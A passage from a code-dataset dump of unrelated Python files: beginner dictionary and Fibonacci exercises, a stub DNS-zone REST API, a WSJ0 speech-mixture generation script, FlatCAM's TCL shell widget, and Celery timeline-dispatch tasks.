dictionary where the keys are numbers between 1 and N (both included) and the values are square of keys. The function should print the dict.Example :\nN =5\n{1: 1, 2:4, 3:9, 4:16, 5:25}'''\nz = int(input('Number: '))\nd = {}\nfor i in range(1, z + 1):\n\td[i] = i ** 2\nprint(d)\n\n'''7. INVERT Dict\nGiven an dict. Invert it (keys become values and values become keys).\n If there is more than key for that given value create an list.Input\n{ a: ‘1’, b: ‘2’, c: ‘2’ } Output\n{ 1: ‘a’, 2: [‘b’, ‘c’] }'''\n\nu = {}\nx = {'a':'1','b': '2', 'c': '2'}\n\nfor key,value in x.items():\n\tif value not in u:\n\t\tu[value] = [key]\n\telse:\n\t\tu[value].append(key)\nprint(u)\n\n\n'''8. FIBONACCI\n Write a function using recursion to find fibonacci numbers:'''\n\ndef fibo(n):\n\tif n <= 1:\n\t\treturn n\n\telse:\n\t\treturn(fibo(n-1) + fibo(n-2))\n\nnumber = int(input('Number: '))\nif number <= 0:\n\tprint('Only positive numbers')\nelse:\n\tfor i in range(number):\n\t\tprint(fibo(i))\n","sub_path":"april3.py","file_name":"april3.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"70556579","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2013 Chiradeep Vittal\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Api: The Tirpunn REST API specification, runs as a Bottle app\"\"\"\n\nfrom bottle import Bottle, debug, route, run, request, response, HTTPResponse\nimport xml.etree.ElementTree as ET\nimport ConfigParser\nimport logging\nfrom tirpunn import Tirpunn\nfrom storage import NoopStore\nfrom dnsserver import NoopDnsServer\n\napi = Bottle()\nstore = NoopStore()\ndnsserver = NoopDnsServer()\nt = Tirpunn('tirpunn.ini', store, dnsserver)\n\n\n@api.route('/hostedzone', method='POST')\ndef create_hosted_zone():\n xml = request.body\n hostedzone = ET.parse(xml)\n name = hostedzone.getroot().find('Name')\n ref = hostedzone.getroot().find('CallerReference')\n if (name is None or ref is None):\n raise HTTPResponse(status='400 MalformedXML')\n domainname = name.text\n reference = ref.text\n comment = 'Comment for %s' % domainname\n #TODO : get comment as well from xml\n [zoneid, rec_count, change_info, nslist] = \\\n t.create_zone(domainname, reference, comment)\n respxml = zone_response(domainname, reference, comment, zoneid,\n rec_count, change_info, nslist)\n response.status = '201 Created'\n return respxml\n\n\ndef zone_response(name, ref, comment, zoneid, rec_count, change_inf, nslist):\n respxml = \"\"\"\n \n \n \n {id}\n {name}\n {ref}\n \n {comment}\n \n {reccount}\n \n \n {changeid}\n {status}\n {submitdate}\n \n \n \n {ns1}\n {ns2}\n {ns3}\n {ns4}\n \n \n \n \"\"\"\n return respxml.format(\n id=zoneid, name=name, ref=ref, comment=comment,\n reccount=rec_count, changeid=change_inf['id'],\n status=change_inf['status'], submitdate=change_inf['date'],\n ns1=nslist[0], ns2=nslist[1], ns3=nslist[2], ns4=nslist[3])\n\n\n@api.route('/hostedzone/:zone', method='GET')\ndef list_hosted_ns_for_zone(zone='Invalid'):\n logging.info(\"GET hosted zone zone=%s\", (zone))\n return zone\n\n\n@api.route('/hostedzone', method='GET')\ndef list_hosted_zones_for_account():\n #need case insensitivity though\n maxItems = request.query.get('maxItems')\n logging.info(\"GET hosted zone maxItems=%s\", (maxItems))\n\n\n@api.route('/hostedzone/:zone', method='DELETE')\ndef deleted_hosted_zone(zone='Invalid'):\n logging.info('Deleted zone =%s' % zone)\n\n\n@api.route('/hostedzone/:zone/rrset', method='POST')\ndef change_record_sets(zone='Invalid'):\n logging.info('Changed record set for zone %s' % (zone))\n logging.debug(request.body.read())\n\n\n@api.route('/hostedzone/change/:changeid', method='GET')\ndef get_state_for_changeid(changeid='Invalid'):\n logging.info('Change status for change id %s is INSYNC' % (changeid))\n\n\n@api.route('/hostedzone/:zone/rrrset', method='GET')\ndef list_records_for_hostedzone(zone='Invalid'):\n logging.info('Listing %s records for zone %s ' %\n (request.query.get('maxItems', zone)))\n\n\ndef main():\n debug(True)\n logging.basicConfig(level='DEBUG')\n run(api, host='localhost', port=8080, reloader=True)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tirpunn/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"3945231","text":"import argparse\nimport csv\nimport datetime\nimport matlab.engine\nimport numpy as np\nimport os\nimport pandas as pd\nimport random\nimport soundfile as sf\n\nfrom scipy.io import savemat\nfrom scipy.signal import resample_poly\n\nS_N_DIR = 's{}'\nMIX_DIR = 'mix'\n\nN_TR = 4000 # number of training files to generate\nN_TT = 600 # number of test files to generate\nN_CV = 1000 # number of validation files to generate\n\nFILELIST_STUB = 'mix_{}_spk_filenames_{}.csv'\n\n\ndef read_wav(path, downsample_8k=False):\n samples, sr_orig = sf.read(path)\n if len(samples.shape) > 1:\n samples = samples[:, 0]\n\n if downsample_8k:\n samples = resample_poly(samples, 8000, sr_orig)\n\n return samples\n\n\ndef write_wav(file, samples, sr):\n int_samples = np.int16(np.round((2 ** 15) * samples))\n sf.write(file, int_samples, sr, subtype='PCM_16')\n\n\ndef fix_length(utterances, min_or_max='max'):\n if min_or_max == 'min':\n utt_len = np.min(np.array(list(map(len, utterances))))\n else: # max\n utt_len = np.max(np.array(list(map(len, utterances))))\n for i in range(len(utterances)):\n if len(utterances[i]) >= utt_len:\n utterances[i] = utterances[i][:utt_len]\n else:\n utterances[i] = np.append(utterances[i], np.zeros(utt_len - len(utterances[i])))\n\n\ndef get_max_amplitude(mix, utterances):\n audio_tracks = utterances\n audio_tracks.append(mix)\n max_amplitude = 0\n for i in range(len(audio_tracks)):\n current_max = np.max(np.abs(audio_tracks[i]))\n if current_max > max_amplitude:\n max_amplitude = current_max\n\n return max_amplitude\n\n\ndef create_wsj0_mix_k_split_csv(wsj_root, csv_path, n_speakers, split, random_seed=0):\n random.seed(random_seed)\n np.random.seed(random_seed)\n\n wsj0_tr_speakers_list = [os.path.basename(f.path) for f in os.scandir(os.path.join(wsj_root, 'wsj0', 'si_tr_s')) if f.is_dir()]\n split_index = int(np.round(len(wsj0_tr_speakers_list) * (N_TR / (N_TR + N_CV))))\n\n wsj0_speakers_tr = wsj0_tr_speakers_list[:split_index]\n wsj0_speakers_cv = wsj0_tr_speakers_list[split_index:]\n\n wsj0_speakers_tt_dt = [os.path.basename(f.path) for f in os.scandir(os.path.join(wsj_root, 'wsj0', 'si_dt_05')) if f.is_dir()]\n wsj0_speakers_tt_et = [os.path.basename(f.path) for f in os.scandir(os.path.join(wsj_root, 'wsj0', 'si_et_05')) if f.is_dir()]\n\n if split == 'tt':\n n_mixtures = N_TT\n wsj0_speakers = wsj0_speakers_tt_dt + wsj0_speakers_tt_et\n elif split == 'cv':\n n_mixtures = N_CV\n wsj0_speakers = wsj0_speakers_cv\n else:\n n_mixtures = N_TR\n wsj0_speakers = wsj0_speakers_tr\n\n rows = []\n for i_mix in range(n_mixtures):\n amp_values_db = np.random.rand(n_speakers) * 10.0 - 5.0\n if n_speakers % 2 == 0: # k even\n amp_values_db[1] = amp_values_db[0] * -1.0\n elif n_speakers % 2 == 1 and n_speakers > 1: # k odd and k > 1\n amp_values_db[0] = 0.0\n amp_values_db[2] = amp_values_db[1] * -1.0\n\n random_speakers = random.sample(wsj0_speakers, k=n_speakers)\n random_utterances = []\n for speaker in random_speakers:\n if split == 'tt' and speaker in wsj0_speakers_tt_dt:\n file_path = os.path.join(wsj_root, 'wsj0', 'si_dt_05', speaker)\n elif split == 'tt' and speaker in wsj0_speakers_tt_et:\n file_path = os.path.join(wsj_root, 'wsj0', 'si_et_05', speaker)\n else:\n file_path = os.path.join(wsj_root, 'wsj0', 'si_tr_s', speaker)\n\n files = [f.path for f in os.scandir(file_path) if f.path.endswith('.wav')]\n random_file = random.choice(files)\n path_parts = []\n for _ in range(4):\n random_file = os.path.split(random_file)\n path_parts.append(random_file[1])\n random_file = random_file[0]\n\n random_utterance = os.path.join(*path_parts[::-1])\n random_utterances.append(random_utterance)\n\n output_filename = ''\n for i, file in enumerate(random_utterances):\n output_filename += os.path.split(file)[-1][:-4]\n output_filename += '_'\n output_filename += '{:.4f}'.format(amp_values_db[i])\n output_filename += '_'\n\n output_filename = output_filename[:-1] + '.wav'\n row_entry = [output_filename] + random_utterances + amp_values_db.tolist()\n rows.append(row_entry)\n\n fields = ['output_filename']\n for i in range(n_speakers):\n fields.append('s{}_path'.format(i + 1))\n\n for i in range(n_speakers):\n fields.append('s{}_snr'.format(i + 1))\n\n csv_filename = os.path.join(csv_path, FILELIST_STUB.format(n_speakers, split))\n with open(csv_filename, mode='w', newline='') as csv_file:\n csvwriter = csv.writer(csv_file)\n csvwriter.writerow(fields)\n csvwriter.writerows(rows)\n\n print('CSV file creation finished for the data split: {}'.format(split))\n\n\ndef main(wsj0_root, output_root, n_speakers, sr_str='8k', data_length='min'):\n assert n_speakers > 0, 'The number of speakers to mix must be greater than zero'\n assert sr_str in ['8k', '16k', 'both'], 'The sample rate argument must be one of: 8k / 16k / both'\n assert data_length in ['max', 'min', 'both'], 'The data length argument must be one of: min / max / both'\n\n mlab_engine = matlab.engine.start_matlab()\n buffer_file = os.path.join(output_root, 'wsj0-mix{}'.format(n_speakers), 'helper.mat')\n\n wav_path = os.path.join(output_root, 'wsj0-mix{}'.format(n_speakers))\n csv_path = os.path.join(wav_path, 'data')\n if not os.path.exists(csv_path):\n os.makedirs(csv_path)\n\n for split in ['tr', 'cv', 'tt']:\n create_wsj0_mix_k_split_csv(wsj0_root, csv_path, n_speakers, split)\n\n if sr_str == 'both':\n sr_options = [8000, 16000]\n elif sr_str == '16k':\n sr_options = [16000]\n else:\n sr_options = [8000]\n\n for sr in sr_options:\n wav_dir = 'wav' + '{}k'.format(int(sr / 1000))\n if sr == 8000:\n downsample = True\n else:\n downsample = False\n\n if data_length == 'both':\n datalen_options = ['max', 'min']\n elif data_length == 'max':\n datalen_options = ['max']\n else:\n datalen_options = ['min']\n\n for datalen in datalen_options:\n for split in ['tr', 'cv', 'tt']:\n output_path = os.path.join(wav_path, wav_dir, datalen, split)\n\n for i in range(n_speakers):\n speaker_i_output_dir = os.path.join(output_path, S_N_DIR.format(i + 1))\n os.makedirs(speaker_i_output_dir, exist_ok=True)\n\n mix_output_dir = os.path.join(output_path, MIX_DIR)\n os.makedirs(mix_output_dir, exist_ok=True)\n\n print('{} {} dataset, {} split'.format(wav_dir, datalen, split))\n\n # read filenames\n wsjmix_path = os.path.join(csv_path, FILELIST_STUB.format(n_speakers, split))\n wsjmix_df = pd.read_csv(wsjmix_path)\n\n for i_utt, csv_tuple in enumerate(wsjmix_df.itertuples(index=False, name=None)):\n scalings = []\n utterances = []\n for i in range(n_speakers):\n s_i = read_wav(os.path.join(wsj0_root, csv_tuple[i + 1]), downsample)\n\n # hack to significantly increase the performance of passing python arrays to the matlab engine\n savemat(buffer_file, dict(s_i=s_i))\n\n # active speech level computation in units of power\n level_i = mlab_engine.activlev(mlab_engine.load(buffer_file)['s_i'], mlab_engine.double(sr), 'n', nargout=2)[1]\n scaling_i = 1 / np.sqrt(level_i) # active speech level normalization to 0 dB\n\n # application of the target SNR (converted from dB to linear scale)\n scaling_i *= 10 ** (csv_tuple[i + n_speakers + 1] / 20)\n s_i *= scaling_i\n scalings.append(scaling_i)\n utterances.append(s_i)\n\n fix_length(utterances, datalen)\n mix = np.sum(np.array(utterances), axis=0)\n\n output_name = csv_tuple[0]\n max_amplitude = get_max_amplitude(mix, utterances)\n max_peak_norm = 0.9 * (1 / max_amplitude) # maximum peak normalization factor\n for i in range(n_speakers):\n speaker_i_output_dir = os.path.join(output_path, S_N_DIR.format(i + 1))\n write_wav(os.path.join(speaker_i_output_dir, output_name), utterances[i] * max_peak_norm, sr)\n\n write_wav(os.path.join(mix_output_dir, output_name), mix * max_peak_norm, sr)\n\n if (i_utt + 1) % 100 == 0:\n print('Completed {} of {} utterances -- {}'.format(i_utt + 1, len(wsjmix_df), str(datetime.datetime.now())))\n\n # remove the matlab helper file when finished\n if os.path.exists(buffer_file):\n os.remove(buffer_file)\n\n mlab_engine.quit()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--output-dir', type=str, help='Output directory for writing WSJ0-mix-k 8 kHz and 16 kHz datasets')\n parser.add_argument('--wsj0-root', type=str, help='Path to the folder containing wsj0/')\n parser.add_argument('--sr-str', type=str, help='The target sample rate of the created wav files. Choose one: 8k / 16k / both')\n parser.add_argument('--data-length', type=str,\n help='Whether to use the maximum or minimum length of the selected utterances. Choose one: min / max / both')\n parser.add_argument('--k', type=int, help='Number of speakers to mix in each mixture')\n args = parser.parse_args()\n main(args.wsj0_root, args.output_dir, args.k, args.sr_str, args.data_length)\n","sub_path":"src/create_wsj0_mix_k_subset.py","file_name":"create_wsj0_mix_k_subset.py","file_ext":"py","file_size_in_byte":10063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"153130202","text":"# ##########################################################\n# FlatCAM: 2D Post-processing for Manufacturing #\n# http://flatcam.org #\n# Author: Juan Pablo Caram (c) #\n# Date: 2/5/2014 #\n# MIT Licence #\n# ##########################################################\n\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QTextCursor, QPixmap\nfrom PyQt5.QtWidgets import QVBoxLayout, QWidget, QHBoxLayout, QLabel\nfrom appGUI.GUIElements import _BrowserTextEdit, _ExpandableTextEdit, FCLabel\nimport html\nimport sys\nimport traceback\n\nimport tkinter as tk\nimport tclCommands\n\nimport gettext\nimport appTranslation as fcTranslate\nimport builtins\n\nfcTranslate.apply_language('strings')\nif '_' not in builtins.__dict__:\n _ = gettext.gettext\n\n\nclass TermWidget(QWidget):\n \"\"\"\n Widget which represents terminal. It only displays text and allows to enter text.\n All high level logic should be implemented by client classes\n\n User pressed Enter. Client class should decide, if command must be executed or user may continue edit it\n \"\"\"\n\n def __init__(self, version, app, *args):\n QWidget.__init__(self, *args)\n\n self.app = app\n\n self._browser = _BrowserTextEdit(version=version, app=app)\n self._browser.setStyleSheet(\"font: 9pt \\\"Courier\\\";\")\n self._browser.setReadOnly(True)\n self._browser.document().setDefaultStyleSheet(\n self._browser.document().defaultStyleSheet() +\n \"span {white-space:pre;}\")\n\n self._edit = _ExpandableTextEdit(self, self)\n self._edit.historyNext.connect(self._on_history_next)\n self._edit.historyPrev.connect(self._on_history_prev)\n self._edit.setFocus()\n self.setFocusProxy(self._edit)\n\n self._delete_line = FCLabel()\n self._delete_line.setPixmap(QPixmap(self.app.resource_location + '/clear_line16.png'))\n self._delete_line.setMargin(3)\n self._delete_line.setToolTip(_(\"Clear the text.\"))\n\n layout = QVBoxLayout(self)\n layout.setSpacing(0)\n layout.setContentsMargins(0, 0, 0, 0)\n layout.addWidget(self._browser)\n\n hlay = QHBoxLayout()\n hlay.addWidget(self._delete_line)\n hlay.addWidget(QLabel(\" \"))\n hlay.addWidget(self._edit)\n layout.addLayout(hlay)\n\n self._history = [''] # current empty line\n self._historyIndex = 0\n\n self._delete_line.clicked.connect(self.on_delete_line_clicked)\n\n def command_line(self):\n return self._edit\n\n def on_delete_line_clicked(self):\n self._edit.clear()\n\n def open_processing(self, detail=None):\n \"\"\"\n Open processing and disable using shell commands again until all commands are finished\n\n :param detail: text detail about what is currently called from TCL to python\n :return: None\n \"\"\"\n\n self._edit.setTextColor(Qt.white)\n self._edit.setTextBackgroundColor(Qt.darkGreen)\n if detail is None:\n self._edit.setPlainText(_(\"...processing...\"))\n else:\n self._edit.setPlainText('%s [%s]' % (_(\"...processing...\"), detail))\n\n self._edit.setDisabled(True)\n self._edit.setFocus()\n\n def close_processing(self):\n \"\"\"\n Close processing and enable using shell commands again\n :return:\n \"\"\"\n\n self._edit.setTextColor(Qt.black)\n self._edit.setTextBackgroundColor(Qt.white)\n self._edit.setPlainText('')\n self._edit.setDisabled(False)\n self._edit.setFocus()\n\n def _append_to_browser(self, style, text):\n \"\"\"\n Convert text to HTML for inserting it to browser\n \"\"\"\n assert style in ('in', 'out', 'err', 'warning', 'success', 'selected', 'raw')\n\n if style != 'raw':\n text = html.escape(text)\n text = text.replace('\\n', '
')\n else:\n text = text.replace('\\n', '
')\n text = text.replace('\\t', '        ')\n\n idx = text.find(']')\n mtype = text[:idx+1].upper()\n mtype = mtype.replace('_NOTCL', '')\n body = text[idx+1:]\n if style.lower() == 'in':\n text = '%s' % text\n elif style.lower() == 'err':\n text = '%s'\\\n '%s'\\\n % (mtype, body)\n elif style.lower() == 'warning':\n # text = '%s' % text\n text = '%s' \\\n '%s' \\\n % (mtype, body)\n elif style.lower() == 'success':\n # text = '%s' % text\n text = '%s' \\\n '%s' \\\n % (mtype, body)\n elif style.lower() == 'selected':\n text = ''\n elif style.lower() == 'raw':\n text = text\n else:\n # without span
is ignored!!!\n text = '%s' % text\n\n scrollbar = self._browser.verticalScrollBar()\n old_value = scrollbar.value()\n # scrollattheend = old_value == scrollbar.maximum()\n\n self._browser.moveCursor(QTextCursor.End)\n self._browser.insertHtml(text)\n\n \"\"\"TODO When user enters second line to the input, and input is resized, scrollbar changes its position\n and stops moving. As quick fix of this problem, now we always scroll down when add new text.\n To fix it correctly, scroll to the bottom, if before input has been resized,\n scrollbar was in the bottom, and remove next line\n \"\"\"\n scrollattheend = True\n\n if scrollattheend:\n scrollbar.setValue(scrollbar.maximum())\n else:\n scrollbar.setValue(old_value)\n\n def exec_current_command(self):\n \"\"\"\n Save current command in the history. Append it to the log. Clear edit line\n Re-implement in the child classes to actually execute command\n \"\"\"\n text = str(self._edit.toPlainText())\n\n # in Windows replace all backslash symbols '\\' with '\\\\' slash because Windows paths are made with backslash\n # and in Python single slash is the escape symbol\n if sys.platform == 'win32':\n text = text.replace('\\\\', '\\\\\\\\')\n\n self._append_to_browser('in', '> ' + text + '\\n')\n\n if len(self._history) < 2 or self._history[-2] != text: # don't insert duplicating items\n try:\n if text[-1] == '\\n':\n self._history.insert(-1, text[:-1])\n else:\n self._history.insert(-1, text)\n except IndexError:\n return\n\n self._historyIndex = len(self._history) - 1\n\n self._history[-1] = ''\n self._edit.clear()\n\n if not text[-1] == '\\n':\n text += '\\n'\n\n self.child_exec_command(text)\n\n def child_exec_command(self, text):\n \"\"\"\n Re-implement in the child classes\n \"\"\"\n pass\n\n def add_line_break_to_input(self):\n self._edit.textCursor().insertText('\\n')\n\n def append_output(self, text):\n \"\"\"\n Append text to output widget\n \"\"\"\n self._append_to_browser('out', text)\n\n def append_raw(self, text):\n \"\"\"\n Append text to output widget as it is\n \"\"\"\n self._append_to_browser('raw', text)\n\n def append_success(self, text):\n \"\"\"Append text to output widget\n \"\"\"\n self._append_to_browser('success', text)\n\n def append_selected(self, text):\n \"\"\"Append text to output widget\n \"\"\"\n self._append_to_browser('selected', text)\n\n def append_warning(self, text):\n \"\"\"Append text to output widget\n \"\"\"\n self._append_to_browser('warning', text)\n\n def append_error(self, text):\n \"\"\"Append error text to output widget. Text is drawn with red background\n \"\"\"\n self._append_to_browser('err', text)\n\n def is_command_complete(self, text):\n \"\"\"\n Executed by _ExpandableTextEdit. Re-implement this function in the child classes.\n \"\"\"\n return True\n\n def browser(self):\n return self._browser\n\n def _on_history_next(self):\n \"\"\"\n Down pressed, show next item from the history\n \"\"\"\n if (self._historyIndex + 1) < len(self._history):\n self._historyIndex += 1\n self._edit.setPlainText(self._history[self._historyIndex])\n self._edit.moveCursor(QTextCursor.End)\n\n def _on_history_prev(self):\n \"\"\"\n Up pressed, show previous item from the history\n \"\"\"\n if self._historyIndex > 0:\n if self._historyIndex == (len(self._history) - 1):\n self._history[-1] = self._edit.toPlainText()\n self._historyIndex -= 1\n self._edit.setPlainText(self._history[self._historyIndex])\n self._edit.moveCursor(QTextCursor.End)\n\n\nclass FCShell(TermWidget):\n def __init__(self, app, version, *args):\n \"\"\"\n Initialize the TCL Shell. A dock widget that holds the GUI interface to the FlatCAM command line.\n\n :param app: When instantiated the sysShell will be actually the FlatCAMApp.App() class\n :param version: FlatCAM version string\n :param args: Parameters passed to the TermWidget parent class\n \"\"\"\n TermWidget.__init__(self, version, *args, app=app)\n self.app = app\n\n self.tcl_commands_storage = {}\n self.tcl = None\n\n self.init_tcl()\n\n self._edit.set_model_data(self.app.myKeywords)\n self.setWindowIcon(self.app.ui.app_icon)\n self.setWindowTitle(_(\"FlatCAM Shell\"))\n self.resize(*self.app.defaults[\"global_shell_shape\"])\n self._append_to_browser('in', \"FlatCAM %s - \" % version)\n self.append_output('%s\\n\\n' % _(\"Type >help< to get started\"))\n\n self.app.ui.shell_dock.setWidget(self)\n self.app.log.debug(\"TCL Shell has been initialized.\")\n\n def init_tcl(self):\n if hasattr(self, 'tcl') and self.tcl is not None:\n # self.tcl = None\n # new object cannot be used here as it will not remember values created for next passes,\n # because tcl was executed in old instance of TCL\n pass\n else:\n self.tcl = tk.Tcl()\n self.setup_shell()\n\n def setup_shell(self):\n \"\"\"\n Creates shell functions. Runs once at startup.\n\n :return: None\n \"\"\"\n\n '''\n How to implement TCL shell commands:\n\n All parameters passed to command should be possible to set as None and test it afterwards.\n This is because we need to see error caused in tcl,\n if None value as default parameter is not allowed TCL will return empty error.\n Use:\n def mycommand(name=None,...):\n\n Test it like this:\n if name is None:\n\n self.raise_tcl_error('Argument name is missing.')\n\n When error occurred, always use raise_tcl_error, never return \"some text\" on error,\n otherwise we will miss it and processing will silently continue.\n Method raise_tcl_error pass error into TCL interpreter, then raise python exception,\n which is caught in exec_command and displayed in TCL shell console with red background.\n Error in console is displayed with TCL trace.\n\n This behavior works only within main thread,\n errors with promissed tasks can be catched and detected only with log.\n TODO: this problem have to be addressed somehow, maybe rewrite promissing to be blocking somehow for\n TCL shell.\n\n Kamil's comment: I will rewrite existing TCL commands from time to time to follow this rules.\n\n '''\n\n # Import/overwrite tcl commands as objects of TclCommand descendants\n # This modifies the variable 'self.tcl_commands_storage'.\n tclCommands.register_all_commands(self.app, self.tcl_commands_storage)\n\n # Add commands to the tcl interpreter\n for cmd in self.tcl_commands_storage:\n self.tcl.createcommand(cmd, self.tcl_commands_storage[cmd]['fcn'])\n\n # Make the tcl puts function return instead of print to stdout\n self.tcl.eval('''\n rename puts original_puts\n proc puts {args} {\n if {[llength $args] == 1} {\n return \"[lindex $args 0]\"\n } else {\n eval original_puts $args\n }\n }\n ''')\n\n def is_command_complete(self, text):\n\n # def skipQuotes(txt):\n # quote = txt[0]\n # text_val = txt[1:]\n # endIndex = str(text_val).index(quote)\n # return text[endIndex:]\n\n # I'm disabling this because I need to be able to load paths that have spaces by\n # enclosing them in quotes --- Marius Stanciu\n # while text:\n # if text[0] in ('\"', \"'\"):\n # try:\n # text = skipQuotes(text)\n # except ValueError:\n # return False\n # text = text[1:]\n\n return True\n\n def child_exec_command(self, text):\n self.exec_command(text)\n\n def exec_command(self, text, no_echo=False):\n \"\"\"\n Handles input from the shell. See FlatCAMApp.setup_shell for shell commands.\n Also handles execution in separated threads\n\n :param text: FlatCAM TclCommand with parameters\n :param no_echo: If True it will not try to print to the Shell because most likely the shell is hidden and it\n will create crashes of the _Expandable_Edit widget\n :return: output if there was any\n \"\"\"\n\n self.app.defaults.report_usage('exec_command')\n\n return self.exec_command_test(text, False, no_echo=no_echo)\n\n def exec_command_test(self, text, reraise=True, no_echo=False):\n \"\"\"\n Same as exec_command(...) with additional control over exceptions.\n Handles input from the shell. See FlatCAMApp.setup_shell for shell commands.\n\n :param text: Input command\n :param reraise: Re-raise TclError exceptions in Python (mostly for unittests).\n :param no_echo: If True it will not try to print to the Shell because most likely the shell is hidden and it\n will create crashes of the _Expandable_Edit widget\n :return: Output from the command\n \"\"\"\n\n tcl_command_string = str(text)\n\n try:\n if no_echo is False:\n self.open_processing() # Disables input box.\n\n result = self.tcl.eval(str(tcl_command_string))\n if result != 'None' and no_echo is False:\n self.append_output(result + '\\n')\n\n except tk.TclError as e:\n # This will display more precise answer if something in TCL shell fails\n result = self.tcl.eval(\"set errorInfo\")\n self.app.log.error(\"Exception on Tcl Command execution: %s\" % (result + '\\n'))\n if no_echo is False:\n self.append_error('ERROR Report: ' + result + '\\n')\n # Show error in console and just return or in test raise exception\n if reraise:\n raise e\n finally:\n if no_echo is False:\n self.close_processing()\n pass\n return result\n\n def raise_tcl_unknown_error(self, unknownException):\n \"\"\"\n Raise exception if is different type than TclErrorException\n this is here mainly to show unknown errors inside TCL shell console.\n\n :param unknownException:\n :return:\n \"\"\"\n\n if not isinstance(unknownException, self.TclErrorException):\n self.raise_tcl_error(\"Unknown error: %s\" % str(unknownException))\n else:\n raise unknownException\n\n def display_tcl_error(self, error, error_info=None):\n \"\"\"\n Escape bracket [ with '\\' otherwise there is error\n \"ERROR: missing close-bracket\" instead of real error\n\n :param error: it may be text or exception\n :param error_info: Some informations about the error\n :return: None\n \"\"\"\n\n if isinstance(error, Exception):\n exc_type, exc_value, exc_traceback = error_info\n if not isinstance(error, self.TclErrorException):\n show_trace = 1\n else:\n show_trace = int(self.app.defaults['global_verbose_error_level'])\n\n if show_trace > 0:\n trc = traceback.format_list(traceback.extract_tb(exc_traceback))\n trc_formated = []\n for a in reversed(trc):\n trc_formated.append(a.replace(\" \", \" > \").replace(\"\\n\", \"\"))\n text = \"%s\\nPython traceback: %s\\n%s\" % (exc_value, exc_type, \"\\n\".join(trc_formated))\n else:\n text = \"%s\" % error\n else:\n text = error\n\n text = text.replace('[', '\\\\[').replace('\"', '\\\\\"')\n self.tcl.eval('return -code error \"%s\"' % text)\n\n def raise_tcl_error(self, text):\n \"\"\"\n This method pass exception from python into TCL as error, so we get stacktrace and reason\n\n :param text: text of error\n :return: raise exception\n \"\"\"\n\n self.display_tcl_error(text)\n raise self.TclErrorException(text)\n\n class TclErrorException(Exception):\n \"\"\"\n this exception is defined here, to be able catch it if we successfully handle all errors from shell command\n \"\"\"\n pass\n\n # \"\"\"\n # Code below is unsused. Saved for later.\n # \"\"\"\n\n # parts = re.findall(r'([\\w\\\\:\\.]+|\".*?\")+', text)\n # parts = [p.replace('\\n', '').replace('\"', '') for p in parts]\n # self.log.debug(parts)\n # try:\n # if parts[0] not in commands:\n # self.shell.append_error(\"Unknown command\\n\")\n # return\n #\n # #import inspect\n # #inspect.getargspec(someMethod)\n # if (type(commands[parts[0]][\"params\"]) is not list and len(parts)-1 != commands[parts[0]][\"params\"]) or \\\n # (type(commands[parts[0]][\"params\"]) is list and len(parts)-1 not in commands[parts[0]][\"params\"]):\n # self.shell.append_error(\n # \"Command %s takes %d arguments. %d given.\\n\" %\n # (parts[0], commands[parts[0]][\"params\"], len(parts)-1)\n # )\n # return\n #\n # cmdfcn = commands[parts[0]][\"fcn\"]\n # cmdconv = commands[parts[0]][\"converters\"]\n # if len(parts) - 1 > 0:\n # retval = cmdfcn(*[cmdconv[i](parts[i + 1]) for i in range(len(parts)-1)])\n # else:\n # retval = cmdfcn()\n # retfcn = commands[parts[0]][\"retfcn\"]\n # if retval and retfcn(retval):\n # self.shell.append_output(retfcn(retval) + \"\\n\")\n #\n # except Exception as e:\n # #self.shell.append_error(''.join(traceback.format_exc()))\n # #self.shell.append_error(\"?\\n\")\n # self.shell.append_error(str(e) + \"\\n\")\n","sub_path":"HSRWLaserTool_APP/FlatCAM_beta_8.994_sources/appTools/ToolShell.py","file_name":"ToolShell.py","file_ext":"py","file_size_in_byte":19668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"117235962","text":"from __future__ import unicode_literals\n\nfrom django.core.paginator import Paginator\n\nfrom celery.task import task\n\n\n@task\ndef dispatch_action(uid, data, dispatch=True):\n from sequere.backends.redis.connection import manager\n from sequere.models import get_followers\n\n from . import Timeline, Action\n\n logger = dispatch_action.get_logger()\n\n instance = manager.get_from_uid(uid)\n\n if not instance:\n logger.error('No instance found for uid: %s' % uid)\n else:\n action = Action.from_data(data)\n\n paginator = Paginator(get_followers(instance), 10)\n\n logger.info('Dispatch action %s to %s followers' % (action, paginator.count))\n\n for num_page in paginator.page_range:\n page = paginator.page(num_page)\n\n for obj, timestamp in page.object_list:\n if action.actor == obj:\n continue\n\n timeline = Timeline(obj)\n timeline.save(action, dispatch=dispatch)\n\n\ndef populate_actions(from_uid, to_uid, method, logger=None):\n from sequere.backends.redis.connection import manager\n\n from . import Timeline\n\n from_instance = manager.get_from_uid(from_uid)\n\n to_instance = manager.get_from_uid(to_uid)\n\n paginator = Paginator(Timeline(from_instance).get_public(), 10)\n\n timeline = Timeline(to_instance)\n\n if logger:\n logger.info('Populate (%s) %s with %s items from %s' % (method,\n to_instance,\n paginator.count,\n from_instance))\n\n for num_page in paginator.page_range:\n page = paginator.page(num_page)\n\n for action in page.object_list:\n getattr(timeline, method)(action, dispatch=False)\n\n\n@task\ndef import_actions(from_uid, to_uid):\n populate_actions(from_uid, to_uid, 'save',\n logger=import_actions.get_logger())\n\n\n@task\ndef remove_actions(from_uid, to_uid):\n populate_actions(from_uid, to_uid, 'delete',\n 